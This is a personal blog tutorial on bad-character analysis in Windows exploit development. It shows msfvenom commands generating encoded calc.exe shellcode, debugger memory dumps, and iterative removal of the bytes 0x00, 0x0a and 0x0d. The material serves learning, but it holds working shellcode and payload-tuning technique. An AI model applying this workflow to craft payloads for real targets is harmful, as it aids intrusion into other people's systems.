Thursday, January 25, 2018

Beginning Windows Exploit Development - Understanding Bad Character Analysis

One of the things that pisses me off as I'm trying to expand my knowledge on exploit development was after I have everything "working" and then my shellcode would not execute. I mean I have my shellcode, I have my jump to address, etc., but my shellcode does not execute.

One of the things I learned here is that "bad characters" can have a significant impact on the success of your shellcode.

As a result for this post, I'm expanding my knowledge about bad character analysis.

At this point I'm looking to execute "calc.exe". So first up, run msfvenom without any bad characters command line option.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xd9\xc1\xd9\x74\x24\xf4\xbf\x89\xfa\x6f\xea\x5b\x33\xc9\xb1"
"\x31\x31\x7b\x18\x03\x7b\x18\x83\xc3\x8d\x18\x9a\x16\x65\x5e"
"\x65\xe7\x75\x3f\xef\x02\x44\x7f\x8b\x47\xf6\x4f\xdf\x0a\xfa"
"\x24\x8d\xbe\x89\x49\x1a\xb0\x3a\xe7\x7c\xff\xbb\x54\xbc\x9e"
"\x3f\xa7\x91\x40\x7e\x68\xe4\x81\x47\x95\x05\xd3\x10\xd1\xb8"
"\xc4\x15\xaf\x00\x6e\x65\x21\x01\x93\x3d\x40\x20\x02\x36\x1b"
"\xe2\xa4\x9b\x17\xab\xbe\xf8\x12\x65\x34\xca\xe9\x74\x9c\x03"
"\x11\xda\xe1\xac\xe0\x22\x25\x0a\x1b\x51\x5f\x69\xa6\x62\xa4"
"\x10\x7c\xe6\x3f\xb2\xf7\x50\xe4\x43\xdb\x07\x6f\x4f\x90\x4c"
"\x37\x53\x27\x80\x43\x6f\xac\x27\x84\xe6\xf6\x03\x00\xa3\xad"
"\x2a\x11\x09\x03\x52\x41\xf2\xfc\xf6\x09\x1e\xe8\x8a\x53\x74"
"\xef\x19\xee\x3a\xef\x21\xf1\x6a\x98\x10\x7a\xe5\xdf\xac\xa9"
"\x42\x2f\xe7\xf0\xe2\xb8\xae\x60\xb7\xa4\x50\x5f\xfb\xd0\xd2"
"\x6a\x83\x26\xca\x1e\x86\x63\x4c\xf2\xfa\xfc\x39\xf4\xa9\xfd"
"\x6b\x97\x2c\x6e\xf7\x76\xcb\x16\x92\x86"

Looking at this in memory we see:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
0:000> d 0012fd64 l dc
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 d9 c1 d9  ................
0012fd74  74 24 f4 bf 89 fa 6f ea-5b 33 c9 b1 31 31 7b 18  t$....o.[3..11{.
0012fd84  03 7b 18 83 c3 8d 18 9a-16 65 5e 65 e7 75 3f ef  .{.......e^e.u?.
0012fd94  02 44 7f 8b 47 f6 4f df-3c 07 00 00 ec fd 12 00  .D..G.O.<.......
0012fda4  52 89 49 00 74 c4 4a 00-88 fd 12 00 08 00 00 00  R.I.t.J.........
0012fdb4  00 00 aa 00 ec fd 12 00-02 00 00 00 00 00 00 00  ................
0012fdc4  00 00 00 00 00 00 00 00-5d ae 49 00 4c fe 12 00  ........].I.L...
0012fdd4  24 0a aa 00 00 00 00 00-00 00 00 00 00 00 00 00  $...............
0012fde4  4c fe 12 00 ba ca 48 00-c1 ca 48 00 dc 93 4a 00  L.....H...H...J.
0012fdf4  02 00 00 00 d0 fe 12 00-00 00 00 00 20 fe 12 00  ............ ...
0012fe04  82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00  ..H.............
0012fe14  20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00   ...........q.A.
0012fe24  48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00  H.....I.....x(..
0012fe34  00 00 00 00 00 00 00 00-00 00 00 00              ............

From above we can already see "00"s. This is already a no no. Additionally we see that while '\x0a' can be found in the 3rd row of the raw shellcode in the script but it is not in the memory dump output. At this point we have two bad characters "\x00" and "\x0a"

Running msfvenom with the bad characters option, we get below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xba\xb3\x4e\x5e\xa8\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x31\x31\x50\x13\x83\xe8\xfc\x03\x50\xbc\xac\xab\x54\x2a\xb2"
"\x54\xa5\xaa\xd3\xdd\x40\x9b\xd3\xba\x01\x8b\xe3\xc9\x44\x27"
"\x8f\x9c\x7c\xbc\xfd\x08\x72\x75\x4b\x6f\xbd\x86\xe0\x53\xdc"
"\x04\xfb\x87\x3e\x35\x34\xda\x3f\x72\x29\x17\x6d\x2b\x25\x8a"
"\x82\x58\x73\x17\x28\x12\x95\x1f\xcd\xe2\x94\x0e\x40\x79\xcf"
"\x90\x62\xae\x7b\x99\x7c\xb3\x46\x53\xf6\x07\x3c\x62\xde\x56"
"\xbd\xc9\x1f\x57\x4c\x13\x67\x5f\xaf\x66\x91\x9c\x52\x71\x66"
"\xdf\x88\xf4\x7d\x47\x5a\xae\x59\x76\x8f\x29\x29\x74\x64\x3d"
"\x75\x98\x7b\x92\x0d\xa4\xf0\x15\xc2\x2d\x42\x32\xc6\x76\x10"
"\x5b\x5f\xd2\xf7\x64\xbf\xbd\xa8\xc0\xcb\x53\xbc\x78\x96\x39"
"\x43\x0e\xac\x0f\x43\x10\xaf\x3f\x2c\x21\x24\xd0\x2b\xbe\xef"
"\x95\xc4\xf4\xb2\xbf\x4c\x51\x27\x82\x10\x62\x9d\xc0\x2c\xe1"
"\x14\xb8\xca\xf9\x5c\xbd\x97\xbd\x8d\xcf\x88\x2b\xb2\x7c\xa8"
"\x79\xd1\xe3\x3a\xe1\x38\x86\xba\x80\x44";

Looking at the dump in memory again:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
0:000> d 0012fd64 l dc
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 ba b3 4e  ...............N
0012fd74  5e a8 db dd d9 74 24 f4-58 2b c9 b1 31 31 50 13  ^....t$.X+..11P.
0012fd84  83 e8 fc 03 50 bc ac ab-54 2a b2 54 a5 aa d3 dd  ....P...T*.T....
0012fd94  40 9b d3 ba 01 8b e3 c9-44 27 8f 9c 7c bc fd 08  @.......D'..|...
0012fda4  72 75 4b 6f bd 86 e0 53-dc 04 fb 87 3e 35 34 da  ruKo...S....>54.
0012fdb4  3f 72 29 17 6d 2b 25 8a-82 58 73 17 28 12 95 1f  ?r).m+%..Xs.(...
0012fdc4  cd e2 94 0e 40 79 cf 90-62 ae 7b 99 7c b3 46 53  ....@y..b.{.|.FS
0012fdd4  f6 07 3c 62 de 56 bd c9-1f 57 4c 13 67 5f af 66  ..<b.V...WL.g_.f
0012fde4  91 9c 52 71 66 df 88 f4-7d 47 5a ae 59 76 8f 29  ..Rqf...}GZ.Yv.)
0012fdf4  29 74 64 3d 75 98 7b 92-00 00 00 00 20 fe 12 00  )td=u.{..... ...
0012fe04  82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00  ..H.............
0012fe14  20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00   ...........q.A.
0012fe24  48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00  H.....I.....x(..
0012fe34  00 00 00 00 00 00 00 00-00 00 00 00              ............

At this point we don't see the "\x0d" which is in line 6 of the original shellcode in the memory dump. Time to regenerate the shellcode. This time we have "\x00", "\x0a" and "\x0d" as bad characters. 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a\x0d'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xdb\xd6\xbd\x45\xe1\xbe\xfa\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x51\x03\x4b\x06\xb1\x41"
"\xb4\xf7\x41\x26\x3c\x12\x70\x66\x5a\x56\x22\x56\x28\x3a\xce"
"\x1d\x7c\xaf\x45\x53\xa9\xc0\xee\xde\x8f\xef\xef\x73\xf3\x6e"
"\x73\x8e\x20\x51\x4a\x41\x35\x90\x8b\xbc\xb4\xc0\x44\xca\x6b"
"\xf5\xe1\x86\xb7\x7e\xb9\x07\xb0\x63\x09\x29\x91\x35\x02\x70"
"\x31\xb7\xc7\x08\x78\xaf\x04\x34\x32\x44\xfe\xc2\xc5\x8c\xcf"
"\x2b\x69\xf1\xe0\xd9\x73\x35\xc6\x01\x06\x4f\x35\xbf\x11\x94"
"\x44\x1b\x97\x0f\xee\xe8\x0f\xf4\x0f\x3c\xc9\x7f\x03\x89\x9d"
"\xd8\x07\x0c\x71\x53\x33\x85\x74\xb4\xb2\xdd\x52\x10\x9f\x86"
"\xfb\x01\x45\x68\x03\x51\x26\xd5\xa1\x19\xca\x02\xd8\x43\x80"
"\xd5\x6e\xfe\xe6\xd6\x70\x01\x56\xbf\x41\x8a\x39\xb8\x5d\x59"
"\x7e\x36\x14\xc0\xd6\xdf\xf1\x90\x6b\x82\x01\x4f\xaf\xbb\x81"
"\x7a\x4f\x38\x99\x0e\x4a\x04\x1d\xe2\x26\x15\xc8\x04\x95\x16"
"\xd9\x66\x78\x85\x81\x46\x1f\x2d\x23\x97"

Looking at the memory dump:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
0:000> d 0012fd64 l ef
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 db d6 bd  ................
0012fd74  45 e1 be fa d9 74 24 f4-58 2b c9 b1 31 83 e8 fc  E....t$.X+..1...
0012fd84  31 68 14 03 68 51 03 4b-06 b1 41 b4 f7 41 26 3c  1h..hQ.K..A..A&<
0012fd94  12 70 66 5a 56 22 56 28-3a ce 1d 7c af 45 53 a9  .pfZV"V(:..|.ES.
0012fda4  c0 ee de 8f ef ef 73 f3-6e 73 8e 20 51 4a 41 35  ......s.ns. QJA5
0012fdb4  90 8b bc b4 c0 44 ca 6b-f5 e1 86 b7 7e b9 07 b0  .....D.k....~...
0012fdc4  63 20 29 91 35 02 70 31-b7 c7 08 78 af 04 34 32  c ).5.p1...x..42
0012fdd4  44 fe c2 c5 8c cf 2b 69-f1 e0 d9 73 35 c6 01 06  D.....+i...s5...
0012fde4  4f 35 bf 11 94 44 1b 97-0f ee e8 0f f4 0f 3c c9  O5...D........<.
0012fdf4  7f 03 89 9d d8 07 0c 71-53 33 85 74 b4 b2 dd 52  .......qS3.t...R
0012fe04  10 9f 86 fb 01 45 68 03-51 26 d5 a1 19 ca 02 d8  .....Eh.Q&......
0012fe14  43 80 d5 6e fe e6 d6 70-01 56 bf 41 8a 39 b8 5d  C..n...p.V.A.9.]
0012fe24  59 7e 36 14 c0 d6 df f1-90 6b 82 01 4f af bb 81  Y~6......k..O...
0012fe34  7a 4f 38 99 0e 4a 04 1d-e2 26 15 c8 04 95 16 d9  zO8..J...&......
0012fe44  66 78 85 81 46 1f 2d 23-97 90 90 90 90 90 90     fx..F.-#.......


At this point it looks like we have a clean shellcode.

References:
http://www.primalsecurity.net/0x7-exploit-tutorial-bad-character-analysis/

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)